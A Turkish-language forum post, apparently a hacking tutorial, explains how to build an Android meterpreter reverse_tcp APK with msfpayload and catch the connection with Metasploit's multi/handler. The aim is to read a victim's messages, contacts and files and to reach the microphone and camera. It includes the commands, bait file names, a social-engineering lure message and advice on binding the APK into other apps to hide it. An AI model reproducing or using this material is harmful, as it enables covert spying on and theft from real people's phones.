NasyoneL
- 25 Ağu 2017
- 25,060 Mesaj
Aktiflik
Seviye
Deneyim
Android telefon hacking dinleme
Cümleten Selamün aleyküm bugün bir kişinin android telefona nasıl sızılır ona bakıcaz . Peki sızdım neler yapabilirim derseniz Dosyaları görme,Rehbere erişim,Mesajları okuma,Mikrofon ve kamera erişim tarzı daha pek çok özelliği görebiliceksiniz . Bunun için Kali linux üzerinden devam edicez ve modeminizde port açmanız gerekecektir .
1.Öncelikle Hedef kişinin dikkatini çekecek bir isim düşünüyoruz tabikide bunu yedirmek içinde sosyal mühendisliğe ihtiyaç olacaktır . Atıyorum Özelresimlerim.apk tarzı atarsanız hedef kişinin indirme ihtimali daha yüksek olur . Kişiye göre değişir .
LHOST>> Kendi makinenizin ip adresidir öğrenmek için ''ifconfig'' yapabilirsiniz .
LPORT>> Buraya Modemden port açıyorsunuz ve port olarak TCP/UDP olsun port olarakta 4444 seçerseniz iyi olur .Çünkü gelen bağlantı 4444 üzerinden bize iletilecektir.
KOD:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.220.129 LPORT=4444 R > /root/Masaüstü/Resimlerim.apk
2. Bundan sonra metasploit üzerinden devam ediyoruz öncelikle exploit seçmemiz lazım yeni komut satırı açıp '' msfconsole '' yazıyoruz .
3. Ardından exploit olarak
KOD:
use exploit/multi/handler
use komutunuda kullanarak exploit seçmiş olduk .
4. Exploit seçtikten sonra sırada payload var payload seçmek için expolite uygun olanı bulduk . Tekrardan set komutuyla aktif hale getirdik . Payload da devrede.
KOD:
set payload android/meterpreter/reverse_tcp
5. Sırada payloadın bizden neler istediğine bakıcaz . '' show options '' diyerek payload bizden neler istediği yes şekllinde yazıyo onları tekrardan girerek payload ta aktif edicez .
6. Gördüğünüz gibi LHOST VE LPORT tekrardan girerek payload aktif edip dinlemeye başlıycaz. '' set '' komutuyla kendi makinemizin ip adresini ve portu tekrardan yazıyoruz başta belirtmiştim LPORT VE LHOST neler olduğunu Kırmızı yazıya dikkatli bakın yukarıda. Yazdık aktif olmuşmu tekrar bakıyoruz ve '' show options '' yazıyoruz .
KOD:
set LHOST 192.168.220.129
set LPORT 4444
7. Artık dinlemeye başlıyabiliriz . '' exploit'' diyerek aktif hale geldi. Artık karşı hedefe atıp sosyal mühendislik ile yedirme zamanı .
8. Yedirme dedik ama bunu linux üzerinden uğraştırır upload sitesi buluyoruz . Ordan indirmesini sağlıyoruz . Örnek olarak '' Canım sadece sana özel resimleri atıyorum kimseyle paylaşma '' tarzı sosyal mühendislik ile sapıklar rahat yer denenmiştir ... Hewaller rahat yer bu tarz konuşmaları sizin sosyal mühendisliğinize kalmış. Eğer olmaz yüklenmez ise apk başka programlarla birleştirerek atın '' mFİleBender 1.0 tarzı'' uygulamalar işinizi görür dosya birleştirmek için ...